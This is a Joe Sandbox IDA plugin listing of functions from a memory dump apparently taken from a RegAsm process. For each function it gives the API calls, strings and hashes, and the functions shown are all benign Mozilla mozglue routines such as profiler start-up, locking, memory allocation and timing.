                                                                                      • Opcode ID: e749a18a689ac63068e319c6175d75d9fc62dc95c948c81e40825e10407543f9
                                                                                      • Instruction ID: 8b3302c69cc1708b2846e8d5e9a2ff3d7c3adfe835a0c6f379300cfc062c5c3c
                                                                                      • Opcode Fuzzy Hash: e749a18a689ac63068e319c6175d75d9fc62dc95c948c81e40825e10407543f9
                                                                                      • Instruction Fuzzy Hash: ACC18A71A087409FDB05CF29C44066ABBF1FFDA714F058A1DE8D497760EB30A886DB82
                                                                                      APIs
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
                                                                                        • Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12EC84
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12EC8C
                                                                                        • Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
                                                                                        • Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12ECA1
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12ECAE
                                                                                      • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C12ECC5
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12ED0A
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C12ED19
                                                                                      • CloseHandle.KERNEL32(?), ref: 6C12ED28
                                                                                      • free.MOZGLUE(00000000), ref: 6C12ED2F
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12ED59
                                                                                      Strings
                                                                                      • [I %d/%d] profiler_ensure_started, xrefs: 6C12EC94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                      • String ID: [I %d/%d] profiler_ensure_started
                                                                                      • API String ID: 4057186437-125001283
                                                                                      • Opcode ID: e0581b34d182ef1128fc09f72ba513a4307ec658c4948ee139463fe6f4915083
                                                                                      • Instruction ID: f93996f447a3559c650905c0f9ac60ded33f209f2a216b365da98a4d6df6f003
                                                                                      • Opcode Fuzzy Hash: e0581b34d182ef1128fc09f72ba513a4307ec658c4948ee139463fe6f4915083
                                                                                      • Instruction Fuzzy Hash: 6A21F779600108AFDB009F76D808BBA7779EF4636DF104210FC2897B41DB399956DBE1
                                                                                      APIs
                                                                                      • AcquireSRWLockShared.KERNEL32 ref: 6C0F3BB4
                                                                                      • ReleaseSRWLockShared.KERNEL32 ref: 6C0F3BD2
                                                                                      • AcquireSRWLockExclusive.KERNEL32 ref: 6C0F3BE5
                                                                                      • ReleaseSRWLockExclusive.KERNEL32 ref: 6C0F3C91
                                                                                      • ReleaseSRWLockShared.KERNEL32 ref: 6C0F3CBD
                                                                                      • moz_xmalloc.MOZGLUE ref: 6C0F3CF1
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 1881024734-0
                                                                                      • Opcode ID: 81870880037f8ed2e11d5c17db33bdffcc98b8e4c356011505f117bce89f8665
                                                                                      • Instruction ID: b099c1bb47447ca7cdbecbfb2557575dbe6fbff02cd3328ffa91e2ef991337a4
                                                                                      • Opcode Fuzzy Hash: 81870880037f8ed2e11d5c17db33bdffcc98b8e4c356011505f117bce89f8665
                                                                                      • Instruction Fuzzy Hash: E4C16DB1A09701CFC714DF29C09475ABBF5BF89314F15865ED9A98BB11D730E886CB82
                                                                                      APIs
                                                                                        • Part of subcall function 6C0EEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0EEB83
                                                                                      • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C12B392,?,?,00000001), ref: 6C1291F4
                                                                                        • Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
                                                                                        • Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                      • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                      • API String ID: 3790164461-3347204862
                                                                                      • Opcode ID: de3747b51e4fc3170606b3d87bc16f343b7c3f463b8e59899c6942e85eb3caa8
                                                                                      • Instruction ID: 573a827d99e9b586d6bcec030ce743219701650617981906f3fc55afcc60be20
                                                                                      • Opcode Fuzzy Hash: de3747b51e4fc3170606b3d87bc16f343b7c3f463b8e59899c6942e85eb3caa8
                                                                                      • Instruction Fuzzy Hash: F5B125B5A002099FDB14DF99C461BEEBBB5BF84308F504029D421ABF80D735E995CBD0
                                                                                      APIs
                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C10C5A3
                                                                                      • WideCharToMultiByte.KERNEL32 ref: 6C10C9EA
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C10C9FB
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C10CA12
                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C10CA2E
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C10CAA5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                      • String ID: (null)$0
                                                                                      • API String ID: 4074790623-38302674
                                                                                      • Opcode ID: 9258343d27097fcdac5373cf043f01de78f8741a616489405369babea3de3866
                                                                                      • Instruction ID: 7cefac2a1079f76989c1d97564c089004b2b9891a36d720b4bfd21bf798f9971
                                                                                      • Opcode Fuzzy Hash: 9258343d27097fcdac5373cf043f01de78f8741a616489405369babea3de3866
                                                                                      • Instruction Fuzzy Hash: 1CA18B707083419FDB11EF28C56875ABBE1AF8A758F04892DE88997742DB35D805CFA2
                                                                                      APIs
                                                                                      • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C10C784
                                                                                      • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C10C801
                                                                                      • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C10C83D
                                                                                      • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C10C891
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                                      • String ID: INF$NAN$inf$nan
                                                                                      • API String ID: 1991403756-4166689840
                                                                                      • Opcode ID: d5cc4f2db930b5fc937760e07a473dd19f54f0b9040435a3a5ceb800434c24c3
                                                                                      • Instruction ID: 2c2cfe66b3038a86290d40116ef612475c4aa026f2f0d3c8031098eeec30bc90
                                                                                      • Opcode Fuzzy Hash: d5cc4f2db930b5fc937760e07a473dd19f54f0b9040435a3a5ceb800434c24c3
                                                                                      • Instruction Fuzzy Hash: BC51B3706087448BDB00EF2CC59129AFBF1BF9A304F008A2DE9D5A7651EB74D9858B53
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C0E3492
                                                                                      • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C0E34A9
                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C0E34EF
                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C0E350E
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0E3522
                                                                                      • __aulldiv.LIBCMT ref: 6C0E3552
                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C0E357C
                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C0E3592
                                                                                        • Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
                                                                                        • Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                      • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                      • API String ID: 3634367004-706389432
                                                                                      • Opcode ID: 3f60383610838d9aa3f623c8c734a9546132f0aeb8daf4928e7ce4ae7c4c8f8d
                                                                                      • Instruction ID: 9c64f78bd49410ccdde084e5d9f2c53a3a2ff82a688eb4941f79a5217abcc9dc
                                                                                      • Opcode Fuzzy Hash: 3f60383610838d9aa3f623c8c734a9546132f0aeb8daf4928e7ce4ae7c4c8f8d
                                                                                      • Instruction Fuzzy Hash: 4D316D71F012059BDF04DBBAC848BBA7BB5FB4A304F10452AE552A3B60EA74A905DB60
                                                                                      APIs
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
                                                                                        • Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12EBA4
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C12EBAC
                                                                                        • Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
                                                                                        • Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12EBC1
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8,?,?,00000000), ref: 6C12EBCE
                                                                                      • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C12EBE5
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8,00000000), ref: 6C12EC37
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C12EC46
                                                                                      • CloseHandle.KERNEL32(?), ref: 6C12EC55
                                                                                      • free.MOZGLUE(00000000), ref: 6C12EC5C
                                                                                      Strings
                                                                                      • [I %d/%d] profiler_start, xrefs: 6C12EBB4
                                                                                      • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C12EA9B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: getenv$CurrentExclusiveLockThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectReleaseSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                      • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                                      • API String ID: 4250961200-1186885292
                                                                                      • Opcode ID: d1db396128d11147581a0f51af890d1d36e664399cca8f0f5da802e61f984f3e
                                                                                      • Instruction ID: f4361d1b1aa0849c1ff89dfa296c5a596da833d6b6e4af2a2446265e594436b3
                                                                                      • Opcode Fuzzy Hash: d1db396128d11147581a0f51af890d1d36e664399cca8f0f5da802e61f984f3e
                                                                                      • Instruction Fuzzy Hash: D211297AA001149FCF009F76D808BAA7B78EF4532DF104220FD2997B80D7389995DBE1
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$moz_xmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 3009372454-0
                                                                                      • Opcode ID: 4d048978869ef6796fce641b0c6eb67a5f97e76efbc7f4c763dc41075ef18f04
                                                                                      • Instruction ID: f1dcbcbbcc1a2d092a9d4494ac45234b668de842e73501051fabb1bd7fea58fc
                                                                                      • Opcode Fuzzy Hash: 4d048978869ef6796fce641b0c6eb67a5f97e76efbc7f4c763dc41075ef18f04
                                                                                      • Instruction Fuzzy Hash: 59B1F472A801109FDB188FFCC99476D77F6AF4A328F580669E456DBBD2D73099408B82
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                      • String ID:
                                                                                      • API String ID: 1192971331-0
                                                                                      • Opcode ID: 6df5a20c75592f41205760eb2cd30ceeaf84b23404bc1a572f0aec31b412d6a7
                                                                                      • Instruction ID: 4f16bab56541f8110c1715946f0b554faed66c7836b768501accd05647dfce83
                                                                                      • Opcode Fuzzy Hash: 6df5a20c75592f41205760eb2cd30ceeaf84b23404bc1a572f0aec31b412d6a7
                                                                                      • Instruction Fuzzy Hash: BB3152B1A047048FDB00AF7DD64826EBBF0FF85305F028A3DE99997211EB749558DB82
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C11D9DB), ref: 6C11F2D2
                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6C11F2F5
                                                                                      • moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6C11F386
                                                                                      • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C11F347
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C11F3C8
                                                                                      • free.MOZGLUE(00000000,00000000), ref: 6C11F3F3
                                                                                      • free.MOZGLUE(00000000,00000000), ref: 6C11F3FC
                                                                                      • free.MOZGLUE(00000000,?,?,00000000), ref: 6C11F413
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: freemoz_xmalloc$HandleModule$malloc
                                                                                      • String ID: ntdll.dll
                                                                                      • API String ID: 301460908-2227199552
                                                                                      • Opcode ID: bd408a49528d308552d68e237f4ce35328aa597b68a7ace606a0cde3249cda06
                                                                                      • Instruction ID: f69782037b2fa2d89919a8ab2e852d7179646f26877b0809d03d712ba4ee2649
                                                                                      • Opcode Fuzzy Hash: bd408a49528d308552d68e237f4ce35328aa597b68a7ace606a0cde3249cda06
                                                                                      • Instruction Fuzzy Hash: 774126B1F082158BDB048F2AD8457AEB7B5EF55358F24803DD87AA7F80EB38A455C781
                                                                                      APIs
                                                                                      • InitializeCriticalSection.KERNEL32(6C16F618), ref: 6C146A68
                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C146A7D
                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C146AA1
                                                                                      • EnterCriticalSection.KERNEL32(6C16F618), ref: 6C146AAE
                                                                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C146AE1
                                                                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C146B15
                                                                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C146B65
                                                                                      • LeaveCriticalSection.KERNEL32(6C16F618,?,?), ref: 6C146B83
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
                                                                                      • String ID: SymInitialize
                                                                                      • API String ID: 3103739362-3981310019
                                                                                      • Opcode ID: e43bb1bd915044de1a03358bec74d682a7dc0030fca893e5ba6d4b02aff2129f
                                                                                      • Instruction ID: 145041c0f0aa94f4fd2bac071c6ca365c9257b51978119f167ab0f221ae5bc47
                                                                                      • Opcode Fuzzy Hash: e43bb1bd915044de1a03358bec74d682a7dc0030fca893e5ba6d4b02aff2129f
                                                                                      • Instruction Fuzzy Hash: A9418E716053449FDF00CF65C888BAA3BB8EB56308F048579E998CB682DB719518DBA1
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C0F9675
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F9697
                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C0F96E8
                                                                                      • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C0F9707
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F971F
                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C0F9773
                                                                                        • Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
                                                                                        • Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1
                                                                                      • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C0F97B7
                                                                                      • FreeLibrary.KERNEL32 ref: 6C0F97D0
                                                                                      • FreeLibrary.KERNEL32 ref: 6C0F97EB
                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C0F9824
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                      • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                      • API String ID: 409848716-3880535382
                                                                                      • Opcode ID: f4f36069461892a2abb41d49b76755a95646d37b4320ff29f306e52b828c172c
                                                                                      • Instruction ID: 05de67c5d7e58c3b22394e7e42d3dd9e5b423fc590419bf02b98ed7b0a7c8305
                                                                                      • Opcode Fuzzy Hash: f4f36069461892a2abb41d49b76755a95646d37b4320ff29f306e52b828c172c
                                                                                      • Instruction Fuzzy Hash: 4541A2B47003059BDF00CFA6D884BA6BBF5FB4931AF044129ED2587B40D730E959DBA1
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0E1EC1
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0E1EE1
                                                                                      • EnterCriticalSection.KERNEL32(6C16E744), ref: 6C0E1F38
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E744), ref: 6C0E1F5C
                                                                                      • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C0E1F83
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0E1FC0
                                                                                      • EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0E1FE2
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0E1FF6
